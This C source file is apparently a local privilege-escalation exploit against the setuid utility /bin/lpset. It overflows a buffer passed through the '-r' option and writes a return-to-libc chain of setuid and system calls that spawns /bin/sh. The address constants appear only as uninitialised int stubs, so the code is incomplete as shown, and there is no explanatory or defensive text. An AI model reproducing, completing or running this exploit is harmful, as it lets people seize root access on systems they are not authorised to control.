
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 int BINSH ;
 int BUFSIZE ;
 int PERCD ;
 int POP1 ;
 int POP2 ;
 int SCANF ;
 int SETUID ;
 int STACK ;
 int SYSTEM ;
 int execle (char*,char*,char*,char*,char*,unsigned char*,char*,int ,char**) ;
 int memset (unsigned char*,char,int) ;

int
main()
{
    unsigned char expbuf[1024];
    char *env[1];
    int *p, i;

    memset(expbuf, 'a', BUFSIZE);
    p = (int *)(expbuf + BUFSIZE);

    *p++ = STACK;
    *p++ = SCANF + 1;
    *p++ = STACK + 6 * 4;
    *p++ = POP2;
    *p++ = PERCD;
    *p++ = STACK + 9 * 4;

    *p++ = STACK + 10 * 4;
    *p++ = SETUID;
    *p++ = POP1;
    *p++ = 0x33333333;
    *p++ = STACK + 15 * 4;

    *p++ = SYSTEM;
    *p++ = 0x33333333;
    *p++ = BINSH;
    *p = 0;

    env[0] = 0;
    execle("/bin/lpset", "/bin/lpset", "-n", "fns", "-r", expbuf, "123", 0,
           env);
    return 0;
}
